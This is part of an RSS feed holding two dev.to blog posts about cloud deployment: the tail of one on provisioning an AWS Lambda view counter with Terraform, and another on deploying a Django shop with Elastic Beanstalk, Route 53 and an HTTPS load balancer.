&lt;/ul&gt;

&lt;p&gt;Here is my provider.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      version ="&amp;gt;=4.9.0"
      source = "hashicorp/aws"
    }
  }
}
provider "aws" {
  access_key = "*****"
  secret_key = "*****"
  region = "us-east-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I've made sure to omit this from my Github using a .gitignore file, since it would expose my AWS user's access key and secret key.&lt;/p&gt;

&lt;p&gt;This file configures the provider that Terraform will use; in our case, AWS.&lt;/p&gt;
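&lt;p&gt;An alternative that keeps secrets out of the file entirely is to omit the keys and let the provider read them from environment variables exported in your shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;provider "aws" {
  region = "us-east-1"
  # credentials are read from the AWS_ACCESS_KEY_ID and
  # AWS_SECRET_ACCESS_KEY environment variables
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;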

&lt;p&gt;Next the main.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;data "archive_file" "zip_the_python_code" {
  type        = "zip"
  source_file = "${path.module}/aws_lambda/func.py"
  output_path = "${path.module}/aws_lambda/func.zip"
}

resource "aws_lambda_function" "myfunc" {
  filename         = data.archive_file.zip_the_python_code.output_path
  source_code_hash = data.archive_file.zip_the_python_code.output_base64sha256
  function_name    = "myfunc"
  role             = "arn:aws:iam::631242286372:role/service-role/cloud-resume-views-role-bnt3oikr"
  handler          = "func.lambda_handler"
  runtime          = "python3.12"
}

resource "aws_lambda_permission" "apigateway" {
  statement_id  = "AllowAPIGatewayInvoke"
  action        = "lambda:InvokeFunction"
  function_name = aws_lambda_function.myfunc.function_name
  principal     = "apigateway.amazonaws.com"
  source_arn    = "arn:aws:execute-api:us-east-1:${data.aws_caller_identity.current.account_id}:${aws_apigatewayv2_api.http_api.id}/*/GET/views"
}

resource "aws_apigatewayv2_api" "http_api" {
  name          = "views-http-api"
  protocol_type = "HTTP"
}

resource "aws_apigatewayv2_integration" "lambda_integration" {
  api_id             = aws_apigatewayv2_api.http_api.id
  integration_type   = "AWS_PROXY"
  integration_uri    = aws_lambda_function.myfunc.invoke_arn
  integration_method = "POST"
  payload_format_version = "1.0" # Explicitly set payload format version
}

resource "aws_apigatewayv2_route" "default_route" {
  api_id    = aws_apigatewayv2_api.http_api.id
  route_key = "GET /views"
  target    = "integrations/${aws_apigatewayv2_integration.lambda_integration.id}"
}

resource "aws_apigatewayv2_stage" "default_stage" {
  api_id      = aws_apigatewayv2_api.http_api.id
  name        = "$default"
  auto_deploy = true
}

output "http_api_url" {
  value = aws_apigatewayv2_stage.default_stage.invoke_url
}

data "aws_caller_identity" "current" {}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The archive_file data source zips the Python code (func.py) into func.zip. The aws_lambda_function resource creates the Lambda function using this zip file. The aws_lambda_permission resource grants API Gateway permission to invoke the Lambda function. The aws_apigatewayv2_api, aws_apigatewayv2_integration, and aws_apigatewayv2_route resources set up an HTTP API Gateway that integrates with the Lambda function, and aws_apigatewayv2_stage deploys this API. The output block provides the API endpoint URL. Additionally, data "aws_caller_identity" "current" retrieves the AWS account details.&lt;/p&gt;

&lt;p&gt;Before initializing and applying the terraform code, I created another folder called "&lt;strong&gt;aws_lambda&lt;/strong&gt;" and within it created a file func.py. This is where the Lambda function code from earlier is pasted in. &lt;/p&gt;

&lt;p&gt;With that in place, run the commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform plan&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After a few moments, my services and settings were configured in AWS.&lt;/p&gt;

&lt;p&gt;One thing to note with this project: we can update the code for the frontend, commit and push to Github, invalidate the CloudFront cache, and see the changes applied. The Lambda function, however, requires the Terraform commands to be re-run for changes to take effect.&lt;/p&gt;

&lt;h2&gt;
  
  
  12. Conclusion
&lt;/h2&gt;

&lt;p&gt;I still have some updates to make with Terraform to configure the rest of the services I am utilizing, but I feel confident about what I've been able to build so far. This challenge has significantly deepened my understanding of AWS, providing me with hands-on experience in managing and automating cloud infrastructure. The skills and knowledge I’ve gained will be invaluable as I continue to build scalable, secure, and efficient cloud architectures in my career. I am excited to further refine my setup and explore additional AWS services and Terraform capabilities.&lt;/p&gt;

&lt;p&gt;And if you want to checkout my project, &lt;a href="//andytran.click"&gt;click here&lt;/a&gt;!&lt;/p&gt;

&lt;h3&gt;
  
  
  13. Edits
&lt;/h3&gt;

&lt;p&gt;The counter has stopped working and produced this error:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Access to fetch at '&lt;a href="https://g6thr4od50.execute-api.us-east-1.amazonaws.com/views" rel="noopener noreferrer"&gt;https://g6thr4od50.execute-api.us-east-1.amazonaws.com/views&lt;/a&gt;' from origin '&lt;a href="https://andytran.click" rel="noopener noreferrer"&gt;https://andytran.click&lt;/a&gt;' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My browser is sending a request to the API Gateway, which is invoking my Lambda function, but my Lambda function isn't responding with the necessary CORS headers. The browser saw that the response didn't include the Access-Control-Allow-Origin header and blocked the response, resulting in a CORS error.&lt;/p&gt;

&lt;p&gt;So I updated the Lambda function here with this in both return statements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So the updated Lambda function looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import json
import boto3

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("cloud-resume-challenge")

def lambda_handler(event, context):
    try:
        # Get the current view count from DynamoDB
        response = table.get_item(Key={
            "id": "1"
        })
        if 'Item' in response:
            views = int(response["Item"]["views"])
        else:
            views = 0  # Default to 0 if the item doesn't exist

        # Increment the view count
        views += 1

        # Update the view count in DynamoDB
        table.put_item(Item={
            "id": "1",
            "views": views
        })

        # Return the updated view count with headers
        return {
            "statusCode": 200,
            "headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            },
            "body": json.dumps({"views": views})
        }

    except Exception as e:
        print(f"Error: {e}")
        return {
            "statusCode": 500,
            "headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            },
            "body": json.dumps({"error": str(e)})
        }

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I also added burst/rate limiting to my API Gateway in my main.tf file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_apigatewayv2_stage" "default_stage" {
  api_id      = aws_apigatewayv2_api.http_api.id
  name        = "$default"
  auto_deploy = true

  default_route_settings {
    throttling_burst_limit = 10
    throttling_rate_limit  = 5
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>awschallenge</category>
    </item>
    <item>
      <title>Deploying a Web-app with Elastic Beanstalk</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Mon, 08 Jul 2024 11:43:45 +0000</pubDate>
      <link>https://dev.to/aktran321/deploying-a-web-app-with-elastic-beanstalk-37hb</link>
      <guid>https://dev.to/aktran321/deploying-a-web-app-with-elastic-beanstalk-37hb</guid>
      <description>&lt;p&gt;So a few months ago I made an E-commerce store as a personal project.  I'll be deploying it today (again) with Elastic Beanstalk and documenting the process.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Elastic Beanstalk
&lt;/h2&gt;

&lt;p&gt;For my macOS machine, I have to install Homebrew. Once installed, run these commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;brew update&lt;/li&gt;
&lt;li&gt;brew install awsebcli&lt;/li&gt;
&lt;li&gt;eb --version&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Create a .ebextensions folder in the root directory of the Django application and inside it, a django.config file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;option_settings:
 aws:elasticbeanstalk:container:python:
  WSGIPath: &amp;lt;app name&amp;gt;.wsgi:application
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For me, the &lt;code&gt;&amp;lt;app name&amp;gt;&lt;/code&gt; placeholder would be replaced with "ecom".&lt;/p&gt;

&lt;p&gt;This name is consistent with this line in my settings.py:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;WSGI_APPLICATION = "ecom.wsgi.application"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since my project is in Django, I have to move to my root directory here,&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fftdjf9p4y5jlks977o8d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fftdjf9p4y5jlks977o8d.png" alt="Root Directory" width="482" height="460"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you're in your virtual environment, deactivate it by running:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;deactivate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Enter the project directory:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;cd ecom&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Then run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb init&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I already have an Elastic Beanstalk config.yaml file, so it only prompts me to set up SSH for my instances. If I had not already launched it before, it would also ask which region to use, an application name, and the language and platform I want to use.&lt;/p&gt;

&lt;p&gt;Run&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb create&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This will create the EC2 instances, security groups, CloudWatch logs and alarms, load balancers, an S3 bucket, etc.&lt;/p&gt;

&lt;p&gt;I chose an application load balancer, "No" to Spot fleet requests, and the default options for the rest of the prompts.&lt;/p&gt;

&lt;p&gt;After 5-10 minutes, the environment is successfully created.&lt;/p&gt;

&lt;p&gt;Running the command&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb open&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Opens the project in the web browser.&lt;/p&gt;

&lt;p&gt;Now, in the settings.py file, take the environment's URL and add it in this line of code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CSRF_TRUSTED_ORIGINS = ['&amp;lt;http://EB URL&amp;gt;']
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows Django's CSRF protection to accept POST requests made to the site over HTTP.&lt;/p&gt;
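
&lt;p&gt;One related note (an assumption about this project's settings, not shown above): Django also needs the environment's hostname in ALLOWED_HOSTS, or it answers every request with a 400. A minimal sketch:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# settings.py -- the EB hostname below is a hypothetical placeholder.
# Without it, Django rejects requests with 400 (DisallowedHost).
ALLOWED_HOSTS = ["&amp;lt;EB URL&amp;gt;"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;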

&lt;p&gt;When making any changes to the project, save and run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb deploy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7mnu385je5so92srp6jp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7mnu385je5so92srp6jp.png" alt="Site Main Page" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Route 53
&lt;/h2&gt;

&lt;p&gt;Since the site is only using HTTP, I want to use Route 53 to buy a domain and register an SSL certificate. I used the SSL certificate to create the 2 CNAME records I need to prove I own shoptop.click and &lt;a href="http://www.shoptop.click" rel="noopener noreferrer"&gt;www.shoptop.click&lt;/a&gt;. Next, I created 2 more A records for shoptop.click and &lt;a href="http://www.shoptop.click" rel="noopener noreferrer"&gt;www.shoptop.click&lt;/a&gt;, using them as aliases pointing to my Elastic Beanstalk environment. &lt;/p&gt;
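
&lt;p&gt;I did this in the console, but for reference, here is a sketch of one of the alias A records expressed with boto3; the hosted zone IDs and the environment CNAME are hypothetical placeholders:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Sketch: UPSERT an alias A record pointing the apex at the EB environment.
# Both hosted zone IDs and the EB CNAME are hypothetical placeholders.
import boto3

route53 = boto3.client("route53")
route53.change_resource_record_sets(
    HostedZoneId="&amp;lt;my hosted zone id&amp;gt;",
    ChangeBatch={
        "Changes": [{
            "Action": "UPSERT",
            "ResourceRecordSet": {
                "Name": "shoptop.click",
                "Type": "A",
                "AliasTarget": {
                    "HostedZoneId": "&amp;lt;EB region hosted zone id&amp;gt;",
                    "DNSName": "&amp;lt;EB environment CNAME&amp;gt;",
                    "EvaluateTargetHealth": False,
                },
            },
        }]
    },
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;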

&lt;p&gt;The settings.py file needs to be updated as well to include the new domain name.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CSRF_TRUSTED_ORIGINS = ["https://shoptop.click", "https://www.shoptop.click"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. EC2 Load Balancer
&lt;/h2&gt;

&lt;p&gt;Currently, the load balancer routes HTTP traffic straight to the application, but I want to redirect HTTP traffic to HTTPS.&lt;/p&gt;

&lt;p&gt;So in the EC2 console, I found my load balancer and clicked "Add listener".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F149w3m7cbuybuwvpa4jy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F149w3m7cbuybuwvpa4jy.png" alt="Load Balancer" width="800" height="159"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then selected the HTTPS protocol, which automatically selects port 443.&lt;/p&gt;

&lt;p&gt;For "&lt;strong&gt;Routing Actions&lt;/strong&gt;", I chose "&lt;strong&gt;forward to target groups&lt;/strong&gt;" and chose my "&lt;strong&gt;awseb-...&lt;/strong&gt;" target group that was automatically created with Elastic Beanstalk.&lt;/p&gt;

&lt;p&gt;Then for the SSL/TLS certificate, I selected "From ACM" and looked for the certificate that I created for my domain shoptop.click.&lt;/p&gt;

&lt;p&gt;Now add the listener.&lt;/p&gt;

&lt;p&gt;Currently, HTTPS is not reachable, since the security group still needs to be edited. But first, the HTTP listener needs to be edited to redirect to my new HTTPS listener instead of directly to my application.&lt;/p&gt;

&lt;p&gt;All this requires is editing the listener's "&lt;strong&gt;Routing Actions&lt;/strong&gt;" and choosing "Redirect to URL" with HTTPS and port 443.&lt;/p&gt;
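
&lt;p&gt;The same redirect can be expressed in code; here is a sketch of the equivalent boto3 call, with the listener ARN as a hypothetical placeholder:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Sketch: rewrite the HTTP listener's default action to redirect to HTTPS:443.
# The listener ARN is a hypothetical placeholder.
import boto3

elbv2 = boto3.client("elbv2")
elbv2.modify_listener(
    ListenerArn="&amp;lt;HTTP listener ARN&amp;gt;",
    DefaultActions=[{
        "Type": "redirect",
        "RedirectConfig": {
            "Protocol": "HTTPS",
            "Port": "443",
            "StatusCode": "HTTP_301",
        },
    }],
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;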

&lt;h2&gt;
  
  
  4. Security Group
&lt;/h2&gt;

&lt;p&gt;While still in the EC2 console, I edited the security group by clicking "&lt;strong&gt;Security Groups&lt;/strong&gt;" on the left sidebar. I found the "&lt;strong&gt;AWSELBLoadBalancerSecurityGroup...&lt;/strong&gt;" and chose to edit its inbound rules.&lt;/p&gt;

&lt;p&gt;Here is the configuration:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls1uhpinl0uvygx5wnhj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls1uhpinl0uvygx5wnhj.png" alt="Security Group Configuration" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;
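
&lt;p&gt;For reference, the same inbound rules can be added with boto3; a sketch, assuming the rules allow HTTP (80) and HTTPS (443) from anywhere and using a placeholder security group ID:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Sketch: allow inbound HTTP (80) and HTTPS (443) from anywhere.
# The security group ID is a hypothetical placeholder.
import boto3

ec2 = boto3.client("ec2")
ec2.authorize_security_group_ingress(
    GroupId="&amp;lt;load balancer security group id&amp;gt;",
    IpPermissions=[
        {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ],
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;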

&lt;p&gt;Now looking back at the load balancer, there is no longer an error for the HTTPS listener.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qdds5y5cxt3c2v0grte.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qdds5y5cxt3c2v0grte.png" alt="Load Balancer Listeners" width="800" height="216"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Shoptop is now up and running easily with Elastic Beanstalk and securely with HTTPS.&lt;/p&gt;

&lt;p&gt;Moving forward, I want to look into encrypting the database with AES and hardening it against SQL injection, which might run up costs (this project is already costing ~$100/mo while running on AWS). I had almost 20 fake users on the site only a day after I launched; apparently email confirmation isn't enough to stop bots, but I implemented CAPTCHA v2 and haven't had a problem since.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
